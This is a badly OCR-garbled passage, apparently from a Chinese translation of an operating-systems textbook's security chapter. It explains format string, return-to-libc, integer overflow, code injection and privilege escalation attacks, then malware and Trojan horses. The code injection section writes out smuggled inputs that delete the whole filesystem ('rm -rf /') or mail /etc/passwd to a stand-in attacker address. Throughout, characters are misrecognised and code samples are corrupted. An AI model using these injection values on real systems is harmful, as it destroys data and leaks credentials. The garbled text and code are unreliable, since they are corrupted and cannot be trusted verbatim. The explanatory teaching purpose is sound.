刻意 识 到 程序 从 键盘 输入 的 并 不 只 是 一 个 简单 的 字符 串 ， 而 是 一 个 格式 
化 字符 串 (Format String) ， 因 此 任何 格式 化 标识 符 都 会 起 作用 。 尽 管 
绝 大 多 数 格 式 化 标识 符 都 规范 了 输出 〈 例 如 ,，“9%s”: 打印 一 个 字符 
P; “Yd”: 打印 一 个 十 进 制 整数 ) ， 有 一 些 却 比较 特殊 。 特 别 


征 “%n”， 它 不 打印 出 任何 信息 ， 而 是 计算 直到 “%n" 出 现 之 前 ， 总 共 打 
印 了 多 少 字符 ， 并 且 将 这 个 数字 保存 到 printf 下 一 个 将 要 使 用 的 参数 中 
去 。 下 面 给 出 一 个 使 用 “%n” 的 例子 : 


int main(int argc,char *argv[]) 














=0; 
printf ("Hello% a ,&i); /* 把 sn 前 出 现 的 字符 个 数 保存 到 变量 i 中 */ 
f ("i=%d\n",i ;7 好 现在 的 值 为 6x/ 

















当 这 上 段 代 码 被 编译 运行 后 ， 输 出 为 : 


Hello World 
i=6 





注意 到 i 的 值 在 函数 printf 中 以 一 种 很 不 显眼 的 方式 被 修改 了 。 这 种 
特性 只 在 极 少数 情况 下 有 用 ， 它 意味 着 打印 一 个 格式 化 字符 串 可 能 导致 
一 个 单词 (或 者 很 多 单词 ) 被 存储 在 内 存 中 。 很 显然 让 printf 上 共有 这 样 
的 特性 并 不 是 一 个 好 主意 ， 然 而 这 个 功能 在 当时 看 来 是 非常 方便 的 。 缀 
大 多 数 软件 的 弱点 都 是 因此 而 存在 。 























就 像 我 们 刚刚 看 到 的 一 样 ， 由 于 程序 员 对 程序 不 严谨 的 修改 ， 可 能 
导致 用 户 有 了 输入 格式 化 字符 串 的 机 会 。 而 打印 一 个 格式 化 字符 串 可 能 
导致 内 存 被 重 写 〈overwrite) ， 这 就 为 覆盖 栈 中 printf 函 数 的 返回 地 址 提 
供 了 一 种 方法 ， 通 过 重 写 这 个 返回 地 址 ， 可 以 使 得 函数 在 printf 函 数 返 
回 时 跳 到 任何 位 置 ， 例 如 跳 到 刚刚 输入 的 格式 化 字符 串 。 这 种 攻击 方式 


叫做 格式 化 字符 串 攻 击 (format string attack) 。 


一 旦 用 户 可 以 修改 内 存 并 强制 程序 跳 转 到 一 段 新 注 入 的 代码 段 ， 这 
段 代 码 就 具有 了 被 攻击 程序 所 拥有 的 所 有 权限 。 如 果 该 程序 是 SETUID 
root， 那 么 攻击 者 就 可 以 创建 一 个 具有 root 权 限 的 shell。 实 现 这 种 攻击 的 
具体 细节 过 于 复杂 ， 本 书 不 再 袭 述 。 这 里 只 想 让 读者 知道 ， 格 式 化 字符 
串 攻击 是 一 个 严重 的 问题 。 如 有 果 读 者 在 Google 搜 索 栏 中 输入 “format 
string attack”《〈 格 式 化 字符 串 攻 击 ) ， 会 找到 很 多 的 相关 信息 。 





男 外 ， 值 得 一 提 的 是 ， 在 本 市 的 例子 中 ， 采 用 定 长 字符 数组 也 很 容 
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9.6.3 ”返回 libc 攻 击 


绥 冲 区 洲 出 攻击 和 格式 化 字符 串 攻 击 都 要 求 回 栈 中 加 入 必要 的 数 
据 ， 并 将 函数 返回 的 地 址 指 癌 这 些 数据 。 一 种 防止 这 种 攻击 的 方法 是 设 
定 栈 页 面 为 读 / 写 权限 ， 而 不 是 执行 权限 。 虽 然 大 多 数 操作 系统 都 一 定 
不 支持 这 个 功能 ， 但 现代 的 “奔腾 ”CPU 可 以 做 到 这 一 点 。 还 有 一 种 攻击 
在 栈 不 能 被 执行 的 条 件 下 也 能 委 效 ， 这 就 是 返回 libc 攻 击 (return to libe 


attack) 。 











假设 一 个 缓冲 区 溢出 攻击 或 格式 化 字符 串 攻击 成 功 修改 了 当前 函数 
的 返回 地 址 ， 但 是 无 法 执行 栈 中 的 攻击 代码 ， 那 么 还 能 否 通 过 修改 当前 
函数 的 返回 地 址 到 指定 位 置 来 实现 攻击 呢 ? 答案 是 肯定 的 。 几 乎 所 有 的 
C 程 序 连 接 了 libc 库 (通常 该 库 为 共享 的 ) ， 这 个 库 包 括 了 C 程 序 几乎 所 
有 的 关键 函数 ， 其 中 的 一 个 就 是 strcpy。 该 函数 将 一 个 任意 长 度 的 字符 
串 从 任意 地 址 复制 到 男 一 地 址 。 这 种 攻击 的 本 质 是 欺骗 strcpy 函 数 将 恶 
意 程 序 〈 通 常 是 共 孚 的 ) 复制 到 数据 段 并 在 那里 执行 








下 面 让 我 们 观察 这 种 攻击 实现 的 具体 细节 。 在 图 9-25a 中 ， 函 数 { 在 
main 函 数 中 被 调用 ， 形 成 图 中 的 栈 。 我 们 假设 这 个 程序 在 超级 用 户 的 权 
限 下 运行 (如 ，SETUID root) ， 并 且 存 在 漏洞 使 得 攻击 者 可 以 将 自己 
的 shellcode 注 入 到 内 存 中 ， 如 图 9-25b 所 示 。 此 时 这 段 代码 在 栈 顶 ， 因 此 





无 法 被 执行 。 


虚拟 地 址 空间 虚拟 地 址 空间 


主 程序 局 部 变量 


主 程序 局 部 变量 


strcpy 的 返回 地 址 
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图 9-25 a 攻击 之 前 的 栈 ; b) 被 重 写 之 后 的 栈 





除了 将 shellcode 放 到 栈 项 ， 攻 击 者 还 需要 重 写 图 9-25b 中 阴影 部 分 的 
四 个 字 。 这 四 个 字 的 最 低地 址 之 前 保存 了 该 函数 的 返回 地 址 (返回 到 
main) ， 但 现在 它 保 存 的 是 strcpy 函 数 的 地 址 ， 所 以 当 {f 返 回 的 时 候 ， 
实际 上 进入 了 strcpy。 在 strcpy 中 ， 栈 指针 将 会 指 同一 个 伪造 的 返回 地 
址 ， 该 函数 完成 后 会 利用 该 地 址 返回 。 而 这 个 伪造 的 返回 地 址 所 指向 
的 ， 就 是 攻击 者 注入 shellcode 的 地 址 。 在 返回 地 址 之 上 的 两 个 字 分 别 是 
strcpy 函 数 执行 复制 操作 的 源 地 址 和 目的 地 址 。 当 strcpy 函 数 执行 完毕 ， 











shellcode 被 复制 到 可 执行 的 数据 段 ， 同 时 strcpy 函 数 返 回 到 shellcode 处 。 
shellcode 此 时 具有 被 攻击 程序 所 有 的 权限 ， 它 为 攻击 者 创建 一 个 shell， 
并 开始 监听 一 些 耳 端口， 等待 来 自 攻 击 者 的 命令 。 从 此 刻 起 ， 这 人 台 机 器 
变 成 了 僵尸 机 器 Czombie) ， 可 以 被 用 来 发 送 垃 圾 邮件 或 者 发 起 “拒绝 
服务 攻击 ”(denial-of-service attack) 。 








9.6.4 整数 洪 出 攻击 


计算 机 进行 定 长 整 型 数 的 运算 ， 整 型 数 的 长 度 一 般 有 8 位 、16 位 、 
32 位 和 64 位 。 如 果 相 加 或 相 乘 的 结果 超过 了 整 型 数 可 以 表示 的 最 大 值 ， 
就 称 溢出 发 生 了 。C 程 序 并 不 会 捕捉 这 个 错误 ， 而 是 会 将 错误 的 结果 存 
储 下 来 并 继续 使 用 。 一 种 特别 的 情况 是 ， 当 变量 为 有 符号 整数 时 ， 两 个 
整数 相 加 或 想 成 的 结果 可 能 因为 溢出 而 成 为 负数 。 如 果 变 量 是 无 符号 整 
数 ， 溢 出 的 结果 依然 是 整数 ， 不 过 会 围绕 0 和 最 大 值 进 行 循环 (wrap 
around) 。 例 如 ， 两 个 16 位 无 符号 整数 的 值 都 是 40 000， 如 果 将 其 相 乘 


的 结果 存 入 另 一 个 一 个 16 位 的 无 符号 整 型 变量 中 ， 其 结果 将 会 是 4096。 








由 于 这 种 洪 出 不 会 被 检测 ， 因 此 可 能 被 用 作 攻 击 的 手段 。 一 种 方式 
就 是 给 程序 传 入 两 个 合法 的 《但 是 非常 大 ) 的 参数 ， 它 们 的 和 或 乘积 将 
导致 溢出 。 例 如 ， 一 些 图 形 程序 要 求 通过 命令 行 传 入 图 像 文件 的 高 和 
览 ， 以 便 对 输入 的 图 像 进行 大 小 转换 。 如 宁 传 入 的 高 度 和 宽度 会 导致 面 
积 的 “ 洲 出 ”， 程 序 束 会 错误 地 计算 存储 图 像 所 需要 的 内 存 空间 ， 从 而 可 
能 申请 一 块 比 实际 小 得 多 的 内 存 。 至 此 缓冲 区 溢出 攻击 的 时 机 已 经 成 
熟 。 对 于 有 符号 整 型 数 ， 也 可 以 采用 相似 的 办 法 进行 攻击 。 





9.6.5 ”代码 注入 攻击 





使 得 目标 程序 执行 它 所 不 期 望 的 代码 是 一 种 攻击 形式 。 比 如 有 时 候 
需要 将 用 户 文 件 以 其 他 文件 名 另存 (如 为 了 备份 )。 如 果 程 序 员 为 了 减 
轻 工 作 量 而 直接 调用 系统 函数 ， 开 启 一 个 shell 并 执行 shell 命 令 。 如 下 的 
C 代 码 











System("ls>file-list") 





开启 shell， 并 执行 命令 





ls>file-list 








列 出 当前 目录 下 的 文件 列表 ， 将 其 复制 到 叫做 fle-list 的 目录 下 。 如 
上 面 所 说 ， 程 序 员 写 的 代码 可 能 如 图 9-26 所 示 。 


int main(int argc, char *argv[]) 

{ 
char src[100], dst[100], cmd[205] = "cp "; 5 声明 3 个 字符 数组 */ 
printf("Please enter name of source file: "); 上 疡 提示 输入 源 文 件 名 */ 
gets(src); 上 ~ BELA A fe A 
strcat(cmd, src); 六 把 输入 信息 连接 在 "cp" 后 面 % 


streat(cmd, " "); 上 产 在 cmd 末 尾 加 入 一 个 空格 % 
printf("Please enter name of destination file: "); A* 提示 输入 目的 文件 名 */ 
gets(dst); I* 从 键盘 获取 输入 信 息 */ 
strcat(cmd, dst); 上 六 构造 完整 的 cmd*/ 
system(cmd); 广 执 行 复制 命令 */ 





图 9-26 可 能 导致 代码 注入 攻击 的 程序 


该 程序 的 功能 是 输入 源 和 目的 文件 名 后 ， 用 cp 命令 产生 一 条 命令 ， 
最 后 调用 system 执 行 这 条 命令 。 如 果 用 户 分 别 输入 “abc* 和 “xyz”， 产 生 


的 命令 为 : 





Cp abc xyz 








它 确 实 是 在 复制 文件 。 


不 对 的 是 ， 这 上 段 代 人 码 在 有 一 个 巨大 的 安全 漏洞 ， 可 以 用 代码 注入 方 
法 进行 攻击 。 假 如 用 户 输入 “abc" 和 “xyz;rm-rf>”， 命 令 就 变 成 了 : 








Cp abc xyz;rm-rf/ 





先 复 制 文件 ， 然 后 递归 地 删除 整个 文件 系统 中 所 有 文件 和 文件 夹 。 
如 果 该 程序 以 系统 管理 员 权 限 运行 ， 此 命令 束 会 完全 执行 。 问 题 的 关键 
在 于 ， 分 写 后 的 字符 都 会 命令 的 方式 在 shell 中 执行 。 





输入 参数 男 一 个 构造 例子 可 以 是 “xyz;mail snooper@badguys.com 
二 /etc/passwd”， 产 生 如 下 命令 : 





Cp abc xyz;mail snooper@badguys.com</etc/passwd 





将 etc 目 录 下 passwd 文 件 发 送 到 了 一 个 不 可 信 的 邮箱 中 了 。 


9.6.6 ”权限 提升 攻击 


另 一 类 攻击 叫做 权限 提升 攻击 (privilege escalation attack) ， 即 攻 

击 者 欺骗 系统 为 其 赋予 比 正常 情况 下 更 高 的 权限 (一 般 情况 下 攻击 者 都 
希望 获取 超级 用 户 权 限 ) 。 比 较 著 名 的 例子 是 利用 计划 任务 Cron 
daemon) 进行 攻击 。cron daemon 帮 助 用 户 每 隔 固定 的 时 间 进 行 工 作 

(每 个 小 时 、 每 天 、 每 周 等 ) cron daemon 通 常 都 运行 在 root 权 限 下 ， 
以 便 可 以 访问 任何 用 户 的 文件 。 它 有 一 个 目录 专门 存放 一 系列 指令 ， 来 
完成 用 户 计 划 的 一 系列 工作 。 当 然 该 目录 不 能 被 用 户 修改 ， 否 则 任何 人 
都 可 以 利用 root 权 限 做 任何 事情 了 。 














攻击 过 程 如 下 : 攻击 者 的 程序 将 其 目录 设 定 为 cron daemon 的 工作 目 
录 ， 此 时 该 程序 并 不 能 对 此 目录 进行 修改 ， 不 过 这 并 不 会 对 攻击 有 任何 
影响 。 该 程序 接 下 来 将 引发 一 次 系统 故障 ， 或 者 直接 将 自己 的 进程 结 
束 ， 从 而 强制 产生 一 次 内 存 信息 转 储 (core dump) 。 信 息 转 储 是 由 操 
作 系 统 在 cron daemon 目 录 下 引发 的 ， 因 此 不 会 被 系 统 保护 机 制 所 阻止 。 
攻击 者 程序 的 内 存 映像 因此 被 合法 地 加 入 到 cron daemon 的 命令 行 中 ， 接 
下 来 将 会 在 root 权 限 下 被 执行 。 首 先 该 程序 会 将 攻击 者 指定 的 某 些 程序 
提升 为 SETUID root 权 限 ， 第 二 部 则 是 运行 这 些 程序 。 当 然 这 种 攻击 方 
式 现 在 已 经 行 不 通 了 ， 不 过 这 个 例子 可 以 帮助 读者 了 解 这 类 攻击 的 大 致 

















9.7 eee 


在 2000 年 之 前 出 生 的 年 轻 人 有 时 候 为 了 打发 无 聊 的 时 间 ， 会 编写 一 
些 亚 意 软件 发 布 到 网 络 上 ， 当 然 他 们 的 目的 只 是 为 了 娱乐 。 这 样 的 软件 
(包括 木马 、 病 毒 和 蠕虫 〉 在 世界 上 快速 地 传播 开 来 ， 并 被 统一 称 为 恶 
意 软 件 Cmalware) 。 当 报道 上 强调 某 个 恶意 软件 造成 了 数 百 万 美元 的 
损失 ， 或 者 无 数 人 丢失 了 他 们 宝 贯 的 数据 ， 亚 意 软 件 的 作者 会 惊讶 于 目 
己 的 编程 技艺 苋 然 能 产生 如 此 大 的 影响 。 然 而 对 于 他 们 来 说 ， 这 只 不 过 
是 一 次 恶作剧 而 已 ， 并 不 涉及 任何 利益 关系 。 








然而 这 样 天 真 的 时 代 已 经 过 去 了 ， 现 在 的 恶意 软件 都 是 由 组 织 严密 
的 犯罪 集团 编写 的 ， 他 们 所 做 的 一 切 只 是 为 了 钱 ， 而 且 并 不 希望 自己 的 
事情 被 媒体 报道 。 绝 大 多 数 这 样 的 恶意 软件 的 设计 目标 都 是 “传播 越 快 
越 好 ， 范 围 越 广 越 好 ?。 当 一 台 机 器 被 感染， 恶意 软件 被 安装 ， 并 且 问 
在 世界 茶 地 的 控制 者 机 器 报告 该 机 器 的 地 址 。 用 于 控制 的 机 器 通常 都 被 
设置 在 一 些 灾 发 达 的 或 法 制 宽 松 的 国家 。 在 被 感染 的 机 器 中 通常 都 会 安 
装 一 个 后 门 程序 Cbackdoor) ， 以 便 犯 菲 者 可 以 随时 问 该 机 器 发 出 指 
令 ， 以 方便 地 控制 该 机 顺 。 以 这 种 方式 极 控 制 的 机 器 叫做 僵尸 机 需 
(zombie) ， 而 所 有 被 控制 的 机 器 合 起 来 称 做 僵尸 网 络 (bomet， 是 


robot network 的 缩写 ) 。 








控制 一 个 伪 尸 网 络 的 罪犯 可 能 处 于 恶意 的 目的 (通常 是 商业 目的 ) 


将 这 个 网 络 租借 出 去 。 最 通常 的 一 种 是 利用 该 网 络 发 送 商 业 垃 圾 邮件 。 

当 一 次 垃圾 邮件 的 攻击 在 网 上 爆发 ， 和 警方 介入 并 试图 找到 邮件 的 来 源 ， 
他 们 最 终 会 友 现 这 些 邮件 来 自 全 世界 成 二 上 万 台 计 算 机 ， 如 果 和 警方 继续 
深入 调查 这 些 计 算 机 的 拥有 者 ， 他 们 将 会 看 到 从 孩子 到 老 妇 的 各 色 人 

物 ， 而 其 中 不 会 有 任何 人 承认 目 己 发 送 过 垃圾 邮件 。 可 见 利用 别人 的 机 
锅 从 事 犯 罪 活 动 使 得 找到 幕后 黑手 成 为 一 件 困难 的 事情 。 








安装 在 他 人 机 器 中 的 恶意 软件 还 可 以 用 于 其 他 犯 徘 活动 ， 如 勒索 。 
想象 一 下 ， 一 人 台 机 需 中 的 恶意 软件 将 磁盘 中 的 所 有 文件 都 进行 了 加 密 ， 
接着 显示 如 下 信息 : 








GREETINGS FROM GENERAL ENCRYPTION! 


TO PURCHASE A DECRYPTION KEY FOR YOUR HARD DISK, PLEASE SEND $100 IN 
SMALL, UNMARKED BILLS TO BOX 2154, PANAMA CITY, PANAMA. THANK YOU. WE 
APPRECIATE YOUR BUSINESS. 











恶意 软件 的 另 一 个 应 用 是 在 被 感染 机 需 中 安装 一 个 记录 用 户 所 有 芋 
击 键盘 动作 的 软件 〈 键 盘 记 录 器 keylogger) ， 该 软件 每 隔 一 段 时 间 将 记 
录 的 结果 发 送 给 其 他 某 台 机 器 或 一 组 机 器 《包括 僵 尸 机 器 ) ， 最 终 发 送 
到 徘 犯 手中 。 一 些 提供 中 间接 收 和 发 送信 息 的 机 器 的 互联 网 提供 者 通常 
是 罪犯 的 同伙 ， 但 调查 他 们 同样 困难 。 


罪犯 在 上 述 过 程 中 收集 的 键盘 融 击 信息 中 ， 真 正 有 价值 的 是 一 些 庄 
如 信用 卡 卡 号 这 样 的 信息 ， 它 可 以 通过 正当 的 商业 途径 来 购买 东西 。 受 





害 者 可 能 知道 还 球 期 才能 发 现 他 的 信用 卡 已 经 被 盗 ， 而 此 时 犯罪 分 子 已 
经 用 这 张 卡 道 遥 度 过 了 几 天 甚至 几 个 星期 。 








为 了 防止 这 类 犯罪 信用卡 公 司 都 采取 人 工 智能 软件 检测 茶 次 不 同 
寻常 的 消费 行为 。 例 如 ， 如 果 一 个 人 通常 情况 下 只 会 在 本 地 的 小 商店 中 
使 用 他 的 信用 卡 ， 而 某 一 天 它 突然 预订 了 很 多 台 昂 贯 的 笔记 本 电脑 并 要 
求 将 他 们 发 送 到 塔 吝 死 斯 坦 的 茶 个 地 址 。 这 时 信用 卡 公司 的 警报 会 啊 
起 ， 员 工会 与 信用 卡 拥有 者 进行 联系 ， 以 确认 这 次 交易 。 当 然 犯罪 分 子 
也 知道 这 种 防御 软件 ， 因 此 他 们 会 试图 调整 自己 的 消费 习惯 ， 并 力图 避 
开 系 统 的 检测 。 








在 僵尸 机 器 上 安装 的 其 他 软件 可 以 搜集 另外 一 些 有 用 的 信息 ， 这 些 

息 与 键盘 记录 其 搜集 的 信息 结合 起 来 ， 可 能 使 得 犯罪 分 子 从 事 更 加 广 
泛 的 身份 盗窃 〈identity theft) 犯罪 。 罪 犯 搜集 了 一 个 人 足够 的 信息 ， 如 
他 的 生日 、 母 亲 出 嫁 前 的 姓名 、 社 会 安全 码 、 银 行 账号 、 密 码 等 ， 因 此 
可 以 成 功 地 模仿 受害 者 ， 并 得 到 新 的 实物 文档 ， 如 蔡 换 驾驶 执照 、 银 行 
签 账 卡 (bank debit card) 、 出 生 证 明 等 。 这 些 信息 可 能 被 卖 给 其 他 罪 
犯 ， 从 而 从 事 更 多 犯罪 活动 。 





























利用 恶意 软件 从 事 的 男 一 种 犯罪 是 锁 取 用 户 账户 中 的 财产 ， 该 类 悉 
意 软 件 平时 一 直 处 在 潜伏 状态 ， 直 到 用 户 正 确 地 登录 到 他 的 网 络 银行 账 
户 中 去 ， 该 软件 立刻 发 起 一 次 快速 的 交易 ， 碍 看 该 账户 有 多 少 余额 ， 并 
将 所 有 的 钱 都 转 到 徘 犯 的 账户 中 ， 这 笔 钱 接着 连续 转移 很 多 个 账 尸 ， 以 




















便 和 警方 在 退 踪 现 金 流 走 同 的 时 候 需 要 花 很 多 天 其 至 儿 个 星期 来 获得 查看 
账户 的 相关 许可 。 这 种 犯罪 通常 设计 很 大 的 交易 量 ， 己 经 不 能 视 为 青 少 
年 的 恶作剧 了 。 








恶意 软件 不 只 会 被 有 组 织 的 犯罪 团伙 所 使 用 ， 在 工业 生产 中 同样 可 
以 看 到 其 喘 影 。 一 个 公司 可 能 会 同 对 手 的 工厂 中 安装 一 些 恶 意 软 件 ， 当 
这 些 亚 意 软件 检测 到 没有 管理 员 处 于 登录 状态 时 ， 便 会 运行 并 干扰 正常 
的 生产 过 程 ， 降 低产 品 的 质量 ， 以 此 来 给 竞争 对 手 制造 肪 烦 。 而 在 其 他 
情况 下 这 类 恶意 软件 不 会 做 任何 事情 ， 因 此 难以 被 检测 到 。 











男 一 种 恶意 软件 可 能 由 野心 动 动 的 公司 领导 人 所 利用 ， 这 种 病毒 被 
投放 在 局 域 网 中 ， 并 且 会 检测 它 是 否 在 总 裁 的 计算 机 中 运行 ， 如 果 是 ， 
则 找到 其 中 的 电子 报表 ， 并 随机 交换 两 个 单元 格 的 内 容 。 而 总 裁 迟 早 会 
基于 这 份 错误 的 报表 做 出 不 正确 的 决定 ， 到 时 等 每 他 的 就 是 被 炒 馈 鱼 的 
下 场 ， 成 为 一 个 无 名 之 非 。 


一 些 人 无 论 走 到 哪里 肩膀 上 都 会 有 一 个 公 片 “请 不 要 与 肩膀 上 的 
RFID ÙH FIE) 。 他 们 对 社会 充满 了 或 真实 或 想象 中 的 怨恨 ， 想 要 进 
行 报复 。 此 时 他 们 可 能 会 选择 恶意 软件 。 很 多 现代 计算 机 将 BIOS 保 存 
在 闪存 中 ， 闪 存 可 以 在 程序 的 控制 下 被 重 写 〈 以 便 生 产 者 可 以 方便 地 修 
正 其 错误 ) 。 恶 意 软 件 向 内 存 中 随机 地 写 入 垃圾 数据 ， 使 得 电脑 无 法 启 
动 。 如 果 内 存在 电脑 插 槽 中 ， 那 么 修复 这 个 问题 需要 将 电脑 打开 ， 并 且 
换 一 个 新 的 闪存， 如 果 闪 存 被 焊接 在 母 板 上 ， 可 能 整 块 母 板 都 可 能 作 











废 ， 不 得 不 买 一 块 新 的 母 板 。 


我 们 不 打算 继续 深入 地 讨论 这 个 问题 ， 读 者 到 这 里 已 经 了 解 天 于 恶 
意 软 件 的 基本 情况 ， 如 果 想 了 解 更 多 内 容 ， 请 在 搜索 引擎 中 输入 “恶意 
软件 ”。 


很 多 人 会 问 :“ 为 什么 恶意 软件 会 如 此 容易 地 传播 开 来 ? ”产生 这 种 
情况 的 原因 有 很 多 。 其 中 之 一 是 世界 上 90% 的 计算 机 运行 的 是 单一 版 本 
HRERS (Windows) ， 使 得 它 成 为 一 个 非常 容易 被 攻击 的 目标 。 假 
设 每 台 计 算 机 都 有 10 个 操作 系统 ， 其 中 每 个 操作 系统 占有 市 场 的 10%， 
那么 传播 恶意 代码 就 会 变 得 加 倍 的 困难 。 这 就 好 比 在 生物 世界 中 ， 物 种 
多 样 化 可 以 有 效 防止 生物 灭绝 。 








第 二 个 原因 是 ， 微 软 在 很 早 以 前 融 强 调 其 Windows 操 作 系统 对 于 没 
有 计算 机 专业 知识 的 人 而 言 是 简单 易 用 的 。 例 如 Windows 人 允许 设置 在 没 
有 密码 的 情况 下 登录 ， 而 UNIX 从 诞生 之 初 就 始终 要 求 登 录 密 码 〈 尽 管 
随 着 Linux 不 断 试图 同 Windows 徘 近 ， 这 种 传统 正在 逐步 地 淡化 )， 操 
作 系 统 易 用 性 是 微软 一 贯 坚持 的 市 场 策略 ， 因 此 他 们 在 安全 性 与 易 用 性 
之 间 不 断 进行 着 权衡 。 如 果 读 者 认为 安全 性 更 加 重要 ， 那 么 请 先 集 止 阅 
读 ， 在 用 你 的 手机 打 电 话 之 前 先 为 它 注册 一 个 PIN 码 一 一 儿 乎 所 有 的 手 
机 都 有 此 功能 。 如 果 你 不 知道 如 何 去 做 ， 那 么 请 从 生产 商 的 网 站 下 载 用 
户 手 册 。 











在 下 面 的 几 节 中 我 们 将 会 看 到 恶意 软件 更 为 一 般 化 的 形式 ， 读 者 将 
会 看 到 这 些 软件 是 如 何 组 织 并 传播 的 。 之 后 我 们 会 提供 对 恶意 软件 的 一 
些 防御 方法 。 


9.7.1 特洛伊 木马 





编写 恶意 代码 是 第 一 步 ， 你 可 以 在 你 的 卧室 里 完成 这 件 事情 。 然 而 
让 数 以 百 万 计 的 人 将 你 的 程序 安 闭 到 他 们 的 电脑 中 则 是 完全 不 同 的 另 一 
件 事 。 我 们 的 软件 编写 者 Mal 该 如 何 做 呢 ? 一 般 的 方法 是 编写 一 些 有 用 
的 程序 ， 并 将 恶意 代码 对 入 到 其 中 。 游 戏 、 音 乐 播放 器 、 色 情书 刊 阅览 
器 等 都 是 比较 好 的 选择 。 人 们 会 目 愿 地 下 载 并 安装 这 些 应 用 程序 。 作 为 
安装 免费 软件 的 代价 ， 他 们 也 同时 安装 了 恶意 软件 。 这 种 方式 叫做 木马 
攻击 〈Torjan horse attack) , 5| B Aiit Sri CAGES) PR S A 
腊 士 兵 的 木马 。 在 计算 机 安全 世界 中 ， 它 指 人 们 自愿 下 载 的 软件 中 所 隐 
藏 的 恶意 软件 。 








当 用 户 下 载 的 程序 运行 时 ， 它 调用 函数 将 恶意 代码 写 入 磁盘 成 为 可 
执行 程序 并 局 动 该 程序 。 恶 意 代 码 接 下 来 便 可 以 进行 任何 预先 设计 好 的 
破坏 活动 ， 如 删除 、 修 改 或 加 密 文 件 。 它 还 可 以 搜索 信用 卡号 、 密 码 和 
其 他 有 用 的 信息 ， 并 且 通 过 互联 网 发 送 给 Mal。 该 恶意 代码 很 有 可 能 连 
接 到 茶 些 卫 端 口上 以 监听 远程 合 令 ， 将 该 计算 机 变 成 僵尸 机 右 ， 随 时 准 
备 发 送 垃圾 邮件 或 完成 攻击 者 的 指示 。 通 常情 况 下 ， 恶 意 代码 还 包括 一 

















些 指令 ， 使 得 它 在 计算 机 每 次 重新 局 动 的 时 候 目 动 司 动 ， 这 一 点 所 有 的 
操作 系统 都 可 以 做 到 。 


木马 攻击 的 美妙 之 处 在 于 ， 木 马 的 拥有 者 不 必 上 自己 费 尽心 机 侵入 到 
受害 者 的 计算 机 中 ， 因 为 木马 是 由 爱 害 者 目 己 安 闭 的 。 





还 有 许多 其 他 方法 引诱 受害 人 执行 特洛伊 木马 程序 。 如 ， 许 多 
UNIX 用 户 都 有 一 个 环境 变量 $PATH， 这 是 一 个 控制 查找 哪些 目录 的 命 
令 。 在 shell 程 序 中 键入 


echo SPATH 
就 可 以 碍 看 。 
例如 ， 用 户 ast 在 系统 上 设置 的 环境 变量 可 能 会 包括 以 下 目录 : 


:/usr/ast/bin:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/ucb:/ 
:/usr/java/bin:/usr/java/lib:/usr/local/man:/usr/openwin/man 














其 他 用 户 可 能 设置 不 同 的 查找 路 径 。 当 用 户 在 shell 中 键入 


prog 





后 ，shell 会 查看 在 目录 /usr/ast/bin/prog 下 是 否 有 程序 。 如 果 有 就 执 
行 ， 如 果 没 有 ，shell 会 尝试 查 
找 /usr/local/bin/prog、/usr/bin/prog、/bin/prog， 直 到 查 遍 所 有 10 个 目录 


为 止 。 假 定 这 些 目 录 中 有 一 个 目录 未 人 锐 保 护 ， 骇 客 即 可 以 在 该 目录 下 放 
一 个 程序 。 如 果 在 整个 目录 列表 中 ， 该 程序 是 第 一 次 出 现 ， 就 会 极 运 
行 ， 从 而 特洛伊 木马 也 被 执行 。 





大 多 数 常 用 的 程序 都 在 /bin 或 /usr/bin 中 ， 因 此 在 /usr/bin/X11/ls 中 放 
一 个 木马 对 一 般 的 程序 而 言 不 会 起 作用 。 因 为 真 的 版 本 会 移 被 找到 。 但 
是 假设 骇 客 在 /usr/bin/X11 中 插入 了 la， 如 果 用 户 误 键入 la 而 不 是 ls IA 
录 命 令 ) ， 那 么 特洛伊 木马 程序 就 会 运行 并 执行 其 功能 ， 随 后 显示 la 并 
不 存在 的 正确 信息 以 迷惑 用 户 。 通 过 在 复杂 的 目录 系统 中 插入 特洛伊 木 
马 程序 并 用 人 们 易 拼 错 的 单词 作为 名 字 ， 用 户 迟 早 会 有 机 会 误 操 作 并 激 
活 特洛伊 木马。 有些 人 可 能 会 是 超级 用 户 〈 超 级 用 户 也 会 误 操 作 ) ， 于 
是 特洛伊 木马 会 有 机 会 把 /bin/ls 蔡 换 成 含有 特洛伊 木马 的 程序 ， 这 样 就 
能 在 任何 时 候 被 激活 。 


Mal， 一 个 恶意 的 但 合法 的 用 户 ， 也 可 能 为 超级 用 户 放 置 陷阱 。 他 
用 含有 特洛伊 木马 程序 的 ls 命令 更 换 了 原 有 的 厂 本 ， 然 后 假装 做 一 些 秘 
密 的 操作 以 引起 超级 用 户 的 注意 ， 如 同时 打开 100 个 计算 约束 进程 。 当 
超级 用 户 键入 下 列 命令 来 查看 Mal 的 目录 时 机 会 束 来 了 : 

cd/home/mal 

is-1 

既然 某 些 shell 程 序 在 通过 $PATH 工 作 之 前 会 首先 确定 当前 所 在 的 目 
录 ， 那 么 超级 用 户 可 能 会 刚刚 激活 Mal 放 置 的 特洛伊 木马。 特洛伊 木马 


可 以 把 /usr/mal/bin/sh 的 SETUID 设 为 root。 接 着 它 执 行 两 个 操作 : 用 
chown 把 /usr/mal/bin/sh 的 owner 改 为 root，, 然 后 用 chmod 设 置 SETUID 
位 。 现 在 Mal 仪 仪 通过 运行 shell 就 可 以 成 为 超级 用 户 了 。 


如 末 Mal 发 现 目 己 缺 钱 ， 他 可 能 会 使 用 下 面 的 特洛伊 木马 来 找 钱 
化 。 第 一 个 方法 是 ， 特 洛 伊 木马 程序 安 朔 诸如 Quicken 之 类 的 软件 检查 
受害 人 是 人 否 有 银行 联机 程序 ， 如 果 有 就 直接 把 有 党 害 人 账户 里 的 钱 转 到 一 
个 用 于 存 钱 的 虚拟 账户 《特别 是 国外 账户 ) 里 。 








第 二 个 方法 是 ， 特 洛 伊 木 马 首先 关闭 modem 的 声音 ， 然 后 拨打 900 
F GOATS) 到 偏远 国家 ， 如 摩尔 多 瓦 〈 前 苏联 的 一 部 分 ) 。 如 果 
特洛伊 木马 运行 时 用 户 在 线 ， 那 么 摩尔 多 瓦 的 900 号 码 就 成 为 该 用 户 的 
Internet 接 入 提供 者 (非常 昂贵 ，， 这 样 用 户 就 不 会 发 觉 并 在 网 上 待 上 好 
几 个 小 时 。 上 述 两 种 方法 都 不 仅仅 是 假设 : 它们 都 曾 发 生 并 被 
Denning (1999) 报道 过 。 关 于 后 一 种 方法 ， 曾 经 有 800 000 分 钟 连接 到 
摩尔 多 瓦 ， 直 到 美国 联邦 交易 局 断 开 连接 并 起 诉 位 于 长 岛 的 三 个 人 。 他 
